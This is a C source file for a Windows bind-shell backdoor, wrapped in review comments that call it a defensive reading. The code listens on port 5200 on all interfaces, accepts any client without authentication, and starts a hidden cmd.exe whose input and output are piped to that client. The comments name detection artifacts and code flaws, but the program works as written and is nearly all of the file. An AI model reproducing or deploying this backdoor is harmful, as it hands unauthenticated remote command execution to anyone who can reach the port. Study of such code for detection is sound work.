#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"Ws2_32")
// Single-connection TCP bind shell for Windows: listens on port 5200, accepts
// one client, starts a hidden cmd.exe whose stdin/stdout/stderr are anonymous
// pipes, and relays bytes between the socket and those pipes.
//
// Review notes (defensive reading of this listing):
// - The listener is bound to ADDR_ANY and nothing in this function
//   authenticates the peer or protects the traffic, so any host that can
//   reach the port gets an interactive command prompt spawned by this process.
// - Artifacts visible in the code that endpoint and network monitoring can
//   key on: a listening TCP socket on port 5200, and a cmd.exe child created
//   with SW_HIDE whose standard handles are inherited pipe handles.
// - None of the setup calls has its result checked, and no socket, handle or
//   Winsock state is released before the function returns.
//
// Returns 0 on every path.
int main()
{
WSADATA ws;
SOCKET listenFD;
// Relay buffer shared by both directions (pipe -> socket and socket -> pipe).
char Buff[1024];
int ret;
// Initialise Winsock, requesting version 2.2; the result is ignored.
WSAStartup(MAKEWORD(2,2),&ws);
// Create the TCP listening socket.
listenFD=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
// Listen on local port 5200 on all interfaces (ADDR_ANY).
// `server` is not zeroed first, so its padding bytes are left uninitialised.
struct sockaddr_in server;
server.sin_family=AF_INET;
server.sin_port=htons(5200);
server.sin_addr.s_addr=ADDR_ANY;
// `ret` is overwritten by listen() and never inspected, so a failed bind
// (for example, port already in use) goes unnoticed here.
ret=bind(listenFD,(sockaddr *)&server,sizeof(server));
ret=listen(listenFD,2);
// Block until one client connects to port 5200, then accept it.
// `server` is reused to receive the peer address; the peer is not validated.
int iAddrSize=sizeof(server);
SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);
SECURITY_ATTRIBUTES pipeattr1,pipeattr2;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
// Anonymous pipe 1: carries the child's stdout/stderr back to this process.
// NOTE(review): nLength is hard-coded to 12 rather than
// sizeof(SECURITY_ATTRIBUTES); that appears to match a 32-bit build only.
pipeattr1.nLength=12;
pipeattr1.lpSecurityDescriptor=0;
// Inheritable, so the child process can receive the pipe handles.
pipeattr1.bInheritHandle=true;
CreatePipe(&hReadPipe1,&hWritePipe1,&pipeattr1,0);
// Anonymous pipe 2: carries client input from this process to the child's stdin.
pipeattr2.nLength=12;
pipeattr2.lpSecurityDescriptor=0;
pipeattr2.bInheritHandle=true;
CreatePipe(&hReadPipe2,&hWritePipe2,&pipeattr2,0);
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
// STARTF_USESHOWWINDOW + SW_HIDE: the child's console window is not shown.
// STARTF_USESTDHANDLES: the child uses the hStd* handles assigned below.
si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=hReadPipe2;
si.hStdOutput=si.hStdError=hWritePipe1;
char cmdline[]="cmd.exe";
PROCESS_INFORMATION ProcessInformation;
// Start cmd.exe with handle inheritance enabled (fifth argument is 1) so the
// pipe ends above become its standard handles. The result is stored in `ret`
// but not checked, and the handles in ProcessInformation are never closed.
ret=CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
unsigned long lBytesRead;
// Relay loop: forward pending child output to the client, otherwise wait for
// client input and feed it to the child. Exits on a failed read/write/send or
// when recv() returns 0.
while (1)
{
// Check pipe 1 (child output) without consuming it; lBytesRead receives the
// number of bytes copied into Buff. The call's result in `ret` is not tested.
ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);
if (lBytesRead)
{
// Pipe 1 has output: read it for real and send it to the remote client.
ret=ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if (!ret) break;
ret=send(clientFD,Buff,lBytesRead,0);
if (ret<=0) break;
}
else
{
// No pending output: receive the next command bytes from the remote client.
// lBytesRead is unsigned long, so the test below is true only for 0; a
// negative recv() result is converted to a large positive value and not caught.
lBytesRead=recv(clientFD,Buff,1024,0);
if (lBytesRead<=0) break;
// Write the received bytes into pipe 2, i.e. the child's stdin. They are
// passed through verbatim; no filtering or logging happens in this function.
ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
if (!ret) break;
}
}
// No closesocket/CloseHandle/WSACleanup is performed, and the child process
// is neither waited on nor terminated here.
return 0;
}